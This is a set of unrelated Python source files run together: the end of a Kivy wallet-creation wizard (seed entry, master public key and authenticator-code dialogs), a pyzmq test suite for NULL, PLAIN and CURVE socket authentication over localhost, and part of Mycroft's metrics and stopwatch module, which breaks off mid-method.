size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
    ''' Abstract dialog to be used as the base for all Create Account Dialogs
    '''
    # Container (from the kv rule above) that receives subclass widgets.
    crcontent = ObjectProperty(None)

    def __init__(self, wizard, **kwargs):
        # :param wizard: the BaseWizard driving this sequence of dialogs.
        # kwargs['run_next']: callback invoked with get_params(...) when
        # the Next button is released.
        super(WizardDialog, self).__init__()
        self.wizard = wizard
        self.ids.back.disabled = not wizard.can_go_back()
        self.app = App.get_running_app()
        self.run_next = kwargs['run_next']
        # Re-fit the dialog whenever the window is resized or rotated.
        _trigger_size_dialog = Clock.create_trigger(self._size_dialog)
        Window.bind(size=_trigger_size_dialog,
                    rotation=_trigger_size_dialog)
        _trigger_size_dialog()
        # Set once a button is released; distinguishes a deliberate close
        # from the user dismissing the dialog outright.
        self._on_release = False

    def _size_dialog(self, dt):
        # Phone ('p...'): fill the screen; tablet: a fraction that
        # depends on orientation.
        app = App.get_running_app()
        if app.ui_mode[0] == 'p':
            self.size = Window.size
        else:
            #tablet
            if app.orientation[0] == 'p':
                #portrait
                self.size = Window.size[0]/1.67, Window.size[1]/1.4
            else:
                self.size = Window.size[0]/2.5, Window.size[1]

    def add_widget(self, widget, index=0):
        # Until the kv rule creates crcontent, children go to the dialog
        # itself; afterwards they are routed into the content grid.
        if not self.crcontent:
            super(WizardDialog, self).add_widget(widget)
        else:
            self.crcontent.add_widget(widget, index=index)

    def on_dismiss(self):
        # Dismissing the wizard before any wallet exists quits the app.
        app = App.get_running_app()
        if app.wallet is None and not self._on_release:
            app.stop()

    def get_params(self, button):
        # Subclasses override; returns the tuple forwarded to run_next.
        return (None,)

    def on_release(self, button):
        # Dispatch Back/Next (or programmatic completion when button is
        # falsy) to the wizard.
        self._on_release = True
        self.close()
        if not button:
            self.parent.dispatch('on_wizard_complete', None)
            return
        if button is self.ids.back:
            self.wizard.go_back()
            return
        params = self.get_params(button)
        self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
    """Wizard step asking for the m-of-n multisig parameters."""

    def get_params(self, button):
        """Return (m, n): required signatures and total cosigners,
        read from the two sliders defined in the kv rule."""
        return self.ids.m.value, self.ids.n.value
class WizardOTPDialogBase(WizardDialog):
    """Base class for dialogs asking for a 6-digit authenticator OTP."""

    def get_otp(self):
        """Return the entered OTP as an int, or None when the field does
        not hold exactly six digits."""
        otp = self.ids.otp.text
        if len(otp) != 6:
            return
        try:
            return int(otp)
        except ValueError:
            # FIX: was a bare 'except:', which also swallowed
            # KeyboardInterrupt/SystemExit; int() can only raise ValueError.
            return

    def on_text(self, dt):
        # Enable Next only once a syntactically valid OTP is present.
        self.ids.next.disabled = self.get_otp() is None

    def on_enter(self, dt):
        # Enter key acts like pressing the (enabled) Next button.
        next = self.ids.next
        if not next.disabled:
            next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
    """OTP prompt for a wallet already registered with TrustedCoin."""

    def __init__(self, wizard, **kwargs):
        WizardOTPDialogBase.__init__(self, wizard, **kwargs)
        # Whether the user asked for a fresh secret instead of entering
        # the existing one.
        self.request_new = False
        self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
        self.message2 = _("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")

    def get_params(self, button):
        return self.get_otp(), self.request_new

    def request_new_secret(self):
        # Flag the re-enrollment request, then advance the wizard.
        self.request_new = True
        self.on_release(True)

    def abort_wallet_creation(self):
        # Delete the half-created wallet file and shut the wizard down.
        self._on_release = True
        os.unlink(self.wizard.storage.path)
        self.wizard.terminate()
        self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
    """OTP enrollment: show a QR code carrying a fresh TOTP secret, then
    ask for the first generated code to confirm the pairing."""

    def __init__(self, wizard, **kwargs):
        WizardOTPDialogBase.__init__(self, wizard, **kwargs)
        otp_secret = kwargs['otp_secret']
        self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s" % otp_secret
        self.message2 = _('Then, enter your Google Authenticator code:')
        # Standard otpauth provisioning URI understood by authenticator apps.
        uri = "otpauth://totp/%s?secret=%s" % ('trustedcoin.com', otp_secret)
        self.ids.qr.set_data(uri)

    def get_params(self, button):
        return self.get_otp(), False
class WizardTOSDialog(WizardDialog):
    """Terms-of-service step: show the TOS text, 'Accept' always enabled."""

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        self.message = kwargs['tos']
        self.message2 = _('Enter your email address:')
        # Nothing to validate here, so the button is always usable.
        accept_button = self.ids.next
        accept_button.text = 'Accept'
        accept_button.disabled = False
class WizardEmailDialog(WizardDialog):
    """Ask for the user's email; Next unlocks only for a valid address."""

    def get_params(self, button):
        return (self.ids.email.text,)

    def on_text(self, dt):
        valid = is_valid_email(self.ids.email.text)
        self.ids.next.disabled = not valid

    def on_enter(self, dt):
        # Enter key is equivalent to tapping an enabled Next button.
        nxt = self.ids.next
        if not nxt.disabled:
            nxt.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
    """Simple confirmation step: show a message, Next always proceeds."""

    def __init__(self, wizard, **kwargs):
        super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
        self.value = 'ok'
        self.message = kwargs.get('message', '')

    def on_parent(self, instance, value):
        # Capture the platform back button while this dialog is attached.
        if value:
            app = App.get_running_app()
            self._back = partial(app.dispatch, 'on_back')

    def get_params(self, button):
        return (True,)
class WizardChoiceDialog(WizardDialog):
    """Present a vertical list of buttons, one per available action."""

    def __init__(self, wizard, **kwargs):
        super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
        self.message = kwargs.get('message', '')
        grid = self.ids.choices
        # Let the grid grow with its children.
        grid.bind(minimum_height=grid.setter('height'))
        for action, label in kwargs.get('choices', []):
            btn = WizardButton(text=label)
            btn.action = action
            btn.height = '48dp'
            btn.root = self
            grid.add_widget(btn)

    def on_parent(self, instance, value):
        # Capture the platform back button while this dialog is attached.
        if value:
            app = App.get_running_app()
            self._back = partial(app.dispatch, 'on_back')

    def get_params(self, button):
        # The pressed button carries the action the user chose.
        return (button.action,)
class LineDialog(WizardDialog):
    """Single-line text entry step (e.g. a seed passphrase)."""
    title = StringProperty('')
    message = StringProperty('')
    warning = StringProperty('')

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        # Empty input is acceptable, so Next starts enabled.
        self.ids.next.disabled = False

    def get_params(self, b):
        return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
    """Displays the freshly generated seed phrase to the user."""
    seed_text = StringProperty('')
    message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
    # Whether the user opted to extend the seed with a custom passphrase.
    ext = False
    def __init__(self, wizard, **kwargs):
        super(ShowSeedDialog, self).__init__(wizard, **kwargs)
        self.seed_text = kwargs['seed_text']
    def on_parent(self, instance, value):
        if not value:
            return
        app = App.get_running_app()
        # Hardware back triggers this dialog's own back button.
        self._back = _back = partial(self.ids.back.dispatch, 'on_release')
    def options_dialog(self):
        from .seed_options import SeedOptionsDialog
        def on_choice(status):
            self.ext = status
        SeedOptionsDialog(self.ext, on_choice).open()
    def get_params(self, b):
        return (self.ext,)
class WordButton(Button):
    # Button used for seed-word suggestions; appearance/behaviour come
    # from the kv rules for this class.
    pass
class WizardButton(Button):
    # Generic wizard choice button; styling is defined in the kv file.
    pass
class RestoreSeedDialog(WizardDialog):
    """Seed-entry wizard page with word completion and a restricted virtual
    keyboard: letter keys are disabled unless they can extend the current
    prefix into a known seed word."""
    def __init__(self, wizard, **kwargs):
        super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
        # Validator callback; truthy result enables the "next" button.
        self._test = kwargs['test']
        from electrum.mnemonic import Mnemonic
        from electrum.old_mnemonic import words as old_wordlist
        # Accept words from both the current and the legacy wordlist.
        self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
        # NOTE(review): `is_test` / `test_seed` are module-level globals
        # (defined outside this view) used to pre-fill the field in test runs.
        self.ids.text_input_seed.text = test_seed if is_test else ''
        self.message = _('Please type your seed phrase using the virtual keyboard.')
        self.title = _('Enter Seed')
        # True when the user opts to extend the seed with a passphrase.
        self.ext = False
    def options_dialog(self):
        from .seed_options import SeedOptionsDialog
        def callback(status):
            self.ext = status
        d = SeedOptionsDialog(self.ext, callback)
        d.open()
    def get_suggestions(self, prefix):
        # Yield every known seed word starting with `prefix`.
        for w in self.words:
            if w.startswith(prefix):
                yield w
    def on_text(self, dt):
        # Re-validate the whole seed, then rebuild the suggestion row and the
        # virtual-keyboard enabled/disabled state after every text change.
        self.ids.next.disabled = not bool(self._test(self.get_text()))
        text = self.ids.text_input_seed.text
        if not text:
            last_word = ''
        elif text[-1] == ' ':
            # Trailing space: the previous word is complete.
            last_word = ''
        else:
            last_word = text.split(' ')[-1]
        enable_space = False
        self.ids.suggestions.clear_widgets()
        suggestions = [x for x in self.get_suggestions(last_word)]
        if last_word in suggestions:
            # The prefix is itself a full word: offer it and allow the space
            # key so the user can move on to the next word.
            b = WordButton(text=last_word)
            self.ids.suggestions.add_widget(b)
            enable_space = True
        for w in suggestions:
            # Show alternatives only while the candidate list is short.
            if w != last_word and len(suggestions) < 10:
                b = WordButton(text=w)
                self.ids.suggestions.add_widget(b)
        # `p` is the set of letters that could follow the current prefix;
        # all other letter keys get disabled (only once typing has begun).
        i = len(last_word)
        p = set()
        for x in suggestions:
            if len(x)>i: p.add(x[i])
        for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
            for c in line.children:
                if isinstance(c, Button):
                    if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
                        c.disabled = (c.text.lower() not in p) and bool(last_word)
                    elif c.text == ' ':
                        c.disabled = not enable_space
    def on_word(self, w):
        # A suggestion button was tapped: replace the partial last word and
        # append a trailing space so typing continues with a fresh word.
        text = self.get_text()
        words = text.split(' ')
        words[-1] = w
        text = ' '.join(words)
        self.ids.text_input_seed.text = text + ' '
        self.ids.suggestions.clear_widgets()
    def get_text(self):
        # Seed text normalised to single spaces with no surrounding blanks.
        ti = self.ids.text_input_seed
        return ' '.join(ti.text.strip().split())
    def update_text(self, c):
        # Virtual-keyboard key handler; '<' acts as backspace.
        c = c.lower()
        text = self.ids.text_input_seed.text
        if c == '<':
            text = text[:-1]
        else:
            text += c
        self.ids.text_input_seed.text = text
    def on_parent(self, instance, value):
        if value:
            tis = self.ids.text_input_seed
            tis.focus = True
            #tis._keyboard.bind(on_key_down=self.on_key_down)
            # Hardware back triggers this dialog's own back button.
            self._back = _back = partial(self.ids.back.dispatch,
                                         'on_release')
            app = App.get_running_app()
    def on_key_down(self, keyboard, keycode, key, modifiers):
        # Enter (13) or numpad-enter (271) triggers the "next" action.
        if keycode[0] in (13, 271):
            self.on_enter()
            return True
    def on_enter(self):
        #self._remove_keyboard()
        # press next
        next = self.ids.next
        if not next.disabled:
            next.dispatch('on_release')
    def _remove_keyboard(self):
        # Detach the key handler and drop focus from the seed input.
        tis = self.ids.text_input_seed
        if tis._keyboard:
            tis._keyboard.unbind(on_key_down=self.on_key_down)
        tis.focus = False
    def get_params(self, b):
        # (seed_text, False, ext).  NOTE(review): the middle element is
        # presumably a bip39/legacy flag consumed by the wizard — confirm.
        return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
    """Re-entry page: the user retypes the seed to prove it was saved."""
    def options_dialog(self):
        # Seed options were already chosen; nothing to configure here.
        pass
    def get_params(self, b):
        return (self.get_text(),)
class ShowXpubDialog(WizardDialog):
    """Shows a master public key with copy / share / QR actions."""
    def __init__(self, wizard, **kwargs):
        super(ShowXpubDialog, self).__init__(wizard, **kwargs)
        self.xpub = kwargs['xpub']
        # Read-only page: "next" is always available.
        self.ids.next.disabled = False
    def do_copy(self):
        # Put the xpub on the system clipboard.
        self.app._clipboard.copy(self.xpub)
    def do_share(self):
        self.app.do_share(self.xpub, _("Master Public Key"))
    def do_qr(self):
        from .qr_dialog import QRDialog
        QRDialog(_("Master Public Key"), self.xpub, True).open()
class AddXpubDialog(WizardDialog):
    """Prompts for a master public key via typing, pasting or QR scan."""
    def __init__(self, wizard, **kwargs):
        super(AddXpubDialog, self).__init__(wizard, **kwargs)
        self.is_valid = kwargs['is_valid']
        self.title = kwargs['title']
        self.message = kwargs['message']
        # When True, several keys may be entered, one per line.
        self.allow_multi = kwargs.get('allow_multi', False)
    def check_text(self, dt):
        # Enable "next" only while the entered text validates.
        ok = bool(self.is_valid(self.get_text()))
        self.ids.next.disabled = not ok
    def get_text(self):
        return self.ids.text_input.text.strip()
    def get_params(self, button):
        return (self.get_text(),)
    def scan_xpub(self):
        def on_complete(text):
            widget = self.ids.text_input
            if self.allow_multi:
                # Multiple cosigner keys: append the scan on its own line.
                widget.text += text + '\n'
            else:
                widget.text = text
        self.app.scan_qr(on_complete)
    def do_paste(self):
        # NOTE(review): `test_xpub` / `is_test` are module-level globals
        # (defined outside this view) used to pre-fill the field in tests.
        self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
    def do_clear(self):
        self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
    '''
    events::
        `on_wizard_complete` Fired when the wizard is done creating/ restoring
        wallet/s.
    '''
    __events__ = ('on_wizard_complete', )
    def on_wizard_complete(self, wallet):
        """overriden by main_window"""
        pass
    def waiting_dialog(self, task, msg, on_finished=None):
        '''Perform a blocking task in the background by running the passed
        method in a thread.
        '''
        def target():
            # run your threaded function
            try:
                task()
            except Exception as err:
                self.show_error(str(err))
            # on completion hide message
            Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
            if on_finished:
                Clock.schedule_once(lambda dt: on_finished(), -1)
        app = App.get_running_app()
        # Modal bubble tells the user to wait while `target` runs.
        app.show_info_bubble(
            text=msg, icon='atlas://gui/kivy/theming/light/important',
            pos=Window.center, width='200sp', arrow_pos=None, modal=True)
        t = threading.Thread(target = target)
        t.start()
    def terminate(self, **kwargs):
        # Hand the finished wallet back to the main window via the event.
        self.dispatch('on_wizard_complete', self.wallet)
    def choice_dialog(self, **kwargs):
        choices = kwargs['choices']
        if len(choices) > 1:
            WizardChoiceDialog(self, **kwargs).open()
        else:
            # Single choice: skip the dialog and continue directly.
            f = kwargs['run_next']
            f(choices[0][0])
    # Thin wrappers that open the corresponding wizard pages.
    def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
    def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
    def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
    def confirm_seed_dialog(self, **kwargs):
        kwargs['title'] = _('Confirm Seed')
        kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
        ConfirmSeedDialog(self, **kwargs).open()
    def restore_seed_dialog(self, **kwargs):
        RestoreSeedDialog(self, **kwargs).open()
    def confirm_dialog(self, **kwargs):
        WizardConfirmDialog(self, **kwargs).open()
    def tos_dialog(self, **kwargs):
        WizardTOSDialog(self, **kwargs).open()
    def email_dialog(self, **kwargs):
        WizardEmailDialog(self, **kwargs).open()
    def otp_dialog(self, **kwargs):
        # Fresh secret -> show the QR enrolment page; otherwise ask for a
        # code from an already-configured authenticator.
        if kwargs['otp_secret']:
            WizardNewOTPDialog(self, **kwargs).open()
        else:
            WizardKnownOTPDialog(self, **kwargs).open()
    def add_xpub_dialog(self, **kwargs):
        kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
        AddXpubDialog(self, **kwargs).open()
    def add_cosigner_dialog(self, **kwargs):
        kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
        AddXpubDialog(self, **kwargs).open()
    def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
    def show_message(self, msg): self.show_error(msg)
    def show_error(self, msg):
        app = App.get_running_app()
        # Defer to the Kivy event loop; safe to call from worker threads.
        Clock.schedule_once(lambda dt: app.show_error(msg))
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        def on_success(old_pin, pin):
            assert old_pin is None
            run_next(pin, False)
        def on_failure():
            # Mismatched PIN entry: report and restart this wizard step.
            self.show_error(_('PIN mismatch'))
            self.run('request_password', run_next)
        popup = PasswordDialog()
        app = App.get_running_app()
        popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
        popup.open()
    def action_dialog(self, action, run_next):
        # Invoke the named BaseWizard action directly.
        f = getattr(self, action)
        f()
|
test_security.py | """Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
    """Exercises libzmq's NULL, PLAIN and CURVE security mechanisms
    against an in-process ZAP (ZMQ RFC 27) authentication handler."""

    def setUp(self):
        if zmq.zmq_version_info() < (4,0):
            raise SkipTest("security is new in libzmq 4.0")
        try:
            zmq.curve_keypair()
        except zmq.ZMQError:
            raise SkipTest("security requires libzmq to be linked against libsodium")
        super(TestSecurity, self).setUp()

    def zap_handler(self):
        """Minimal ZAP responder: services exactly one request then closes."""
        socket = self.context.socket(zmq.REP)
        socket.bind("inproc://zeromq.zap.01")
        try:
            msg = self.recv_multipart(socket)
            version, sequence, domain, address, identity, mechanism = msg[:6]
            if mechanism == b'PLAIN':
                username, password = msg[6:]
            elif mechanism == b'CURVE':
                key = msg[6]
            self.assertEqual(version, b"1.0")
            self.assertEqual(identity, b"IDENT")
            reply = [version, sequence]
            # CURVE and NULL are accepted unconditionally here; PLAIN must
            # present the expected credentials.
            if mechanism == b'CURVE' or \
                (mechanism == b'PLAIN' and username == USER and password == PASS) or \
                (mechanism == b'NULL'):
                reply.extend([
                    b"200",
                    b"OK",
                    b"anonymous",
                    b"",
                ])
            else:
                reply.extend([
                    b"400",
                    b"Invalid username or password",
                    b"",
                    b"",
                ])
            socket.send_multipart(reply)
        finally:
            socket.close()

    def start_zap(self):
        """Runs zap_handler in a background thread."""
        self.zap_thread = Thread(target=self.zap_handler)
        self.zap_thread.start()

    def stop_zap(self):
        self.zap_thread.join()

    def bounce(self, server, client):
        """Round-trips a random two-frame message client -> server -> client."""
        msg = [os.urandom(64), os.urandom(64)]
        client.send_multipart(msg)
        recvd = self.recv_multipart(server)
        self.assertEqual(recvd, msg)
        server.send_multipart(recvd)
        msg2 = self.recv_multipart(client)
        self.assertEqual(msg2, msg)

    def test_null(self):
        """test NULL (default) security"""
        server = self.socket(zmq.DEALER)
        client = self.socket(zmq.DEALER)
        self.assertEqual(client.MECHANISM, zmq.NULL)
        self.assertEqual(server.mechanism, zmq.NULL)
        self.assertEqual(client.plain_server, 0)
        self.assertEqual(server.plain_server, 0)
        iface = 'tcp://127.0.0.1'
        port = server.bind_to_random_port(iface)
        client.connect("%s:%i" % (iface, port))
        self.bounce(server, client)

    def test_plain(self):
        """test PLAIN authentication"""
        server = self.socket(zmq.DEALER)
        server.identity = b'IDENT'
        client = self.socket(zmq.DEALER)
        self.assertEqual(client.plain_username, b'')
        self.assertEqual(client.plain_password, b'')
        client.plain_username = USER
        client.plain_password = PASS
        self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
        self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
        self.assertEqual(client.plain_server, 0)
        self.assertEqual(server.plain_server, 0)
        server.plain_server = True
        self.assertEqual(server.mechanism, zmq.PLAIN)
        self.assertEqual(client.mechanism, zmq.PLAIN)
        assert not client.plain_server
        assert server.plain_server
        self.start_zap()
        iface = 'tcp://127.0.0.1'
        port = server.bind_to_random_port(iface)
        client.connect("%s:%i" % (iface, port))
        self.bounce(server, client)
        self.stop_zap()

    def skip_plain_inauth(self):
        """test PLAIN failed authentication (disabled: renamed from test_*)"""
        server = self.socket(zmq.DEALER)
        server.identity = b'IDENT'
        client = self.socket(zmq.DEALER)
        self.sockets.extend([server, client])
        client.plain_username = USER
        client.plain_password = b'incorrect'
        server.plain_server = True
        self.assertEqual(server.mechanism, zmq.PLAIN)
        self.assertEqual(client.mechanism, zmq.PLAIN)
        self.start_zap()
        iface = 'tcp://127.0.0.1'
        port = server.bind_to_random_port(iface)
        client.connect("%s:%i" % (iface, port))
        client.send(b'ping')
        # Rejected by ZAP: the message must never arrive.
        server.rcvtimeo = 250
        self.assertRaisesErrno(zmq.EAGAIN, server.recv)
        self.stop_zap()

    def test_keypair(self):
        """test curve_keypair"""
        try:
            public, secret = zmq.curve_keypair()
        except zmq.ZMQError:
            raise SkipTest("CURVE unsupported")
        self.assertEqual(type(secret), bytes)
        self.assertEqual(type(public), bytes)
        self.assertEqual(len(secret), 40)
        self.assertEqual(len(public), 40)
        # verify that both keys are valid Z85 decoding to 32 raw bytes.
        # BUGFIX: the decoded names were previously swapped (`public` was
        # decoded into `bsecret` and vice versa); the order now matches.
        bpublic, bsecret = [ z85.decode(key) for key in (public, secret) ]
        self.assertEqual(type(bsecret), bytes)
        self.assertEqual(type(bpublic), bytes)
        self.assertEqual(len(bsecret), 32)
        self.assertEqual(len(bpublic), 32)

    def test_curve(self):
        """test CURVE encryption"""
        server = self.socket(zmq.DEALER)
        server.identity = b'IDENT'
        client = self.socket(zmq.DEALER)
        self.sockets.extend([server, client])
        try:
            server.curve_server = True
        except zmq.ZMQError as e:
            # will raise EINVAL if not linked against libsodium
            if e.errno == zmq.EINVAL:
                raise SkipTest("CURVE unsupported")
        server_public, server_secret = zmq.curve_keypair()
        client_public, client_secret = zmq.curve_keypair()
        server.curve_secretkey = server_secret
        server.curve_publickey = server_public
        client.curve_serverkey = server_public
        client.curve_publickey = client_public
        client.curve_secretkey = client_secret
        self.assertEqual(server.mechanism, zmq.CURVE)
        self.assertEqual(client.mechanism, zmq.CURVE)
        self.assertEqual(server.get(zmq.CURVE_SERVER), True)
        self.assertEqual(client.get(zmq.CURVE_SERVER), False)
        self.start_zap()
        iface = 'tcp://127.0.0.1'
        port = server.bind_to_random_port(iface)
        client.connect("%s:%i" % (iface, port))
        self.bounce(server, client)
        self.stop_zap()
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import threading
import time
from mycroft.util.log import LOG
from mycroft.util.setup_base import get_version
from copy import copy
def report_metric(name, data):
    """
    Report a general metric to the Mycroft servers.

    Currently a no-op: the upload path is disabled and the metric is only
    logged at debug level.

    Args:
        name (str): Name of metric. Must use only letters and hyphens
        data (dict): JSON dictionary to report. Must be valid JSON
    """
    # Upload deliberately disabled; kept for reference.
    #try:
    #    if Configuration().get()['opt_in']:
    #        DeviceApi().report_metric(name, data)
    #except (requests.HTTPError, requests.exceptions.ConnectionError) as e:
    #    LOG.error('Metric couldn\'t be uploaded, due to a network error ({})'
    #              .format(e))
    # BUGFIX: corrected "Supressed" typo in the log message.
    LOG.debug("Suppressed metric report: " + str(name) + str(data))
def report_timing(ident, system, timing, additional_data=None):
    """
    Create standardized message for reporting timing.

    Currently a no-op beyond a debug log entry (upload disabled).

    Args:
        ident (str): identifier of user interaction
        system (str): system that generated the report
        timing (Stopwatch): Stopwatch object with recorded timing
        additional_data (dict): dictionary with related data
    """
    additional_data = additional_data or {}
    report = copy(additional_data)
    report['id'] = ident
    report['system'] = system
    report['start_time'] = timing.timestamp
    report['time'] = timing.time
    #report_metric('timing', report)
    # BUGFIX: corrected "Supressed" typo in the log message.
    LOG.debug("Suppressed timing report: " + str(report))
class Stopwatch(object):
    """
    Simple time measuring class.

    Usable as a context manager::

        with Stopwatch() as sw:
            do_work()
        print(sw.time)
    """
    def __init__(self):
        self.timestamp = None  # wall-clock time of the last start()/lap()
        self.time = None       # measured duration recorded by stop()
    def start(self):
        """
        Start a time measurement
        """
        self.timestamp = time.time()
    def lap(self):
        """Return seconds since the last start()/lap() and restart the clock."""
        cur_time = time.time()
        start_time = self.timestamp
        self.timestamp = cur_time
        return cur_time - start_time
    def stop(self):
        """
        Stop a running time measurement. returns the measured time
        """
        cur_time = time.time()
        start_time = self.timestamp
        self.time = cur_time - start_time
        return self.time
    def __enter__(self):
        """
        Start stopwatch when entering with-block.
        """
        self.start()
        # BUGFIX: return self so `with Stopwatch() as sw:` binds the
        # stopwatch instead of None.
        return self
    def __exit__(self, tpe, value, tb):
        """
        Stop stopwatch when exiting with-block.
        """
        self.stop()
    def __str__(self):
        cur_time = time.time()
        if self.timestamp:
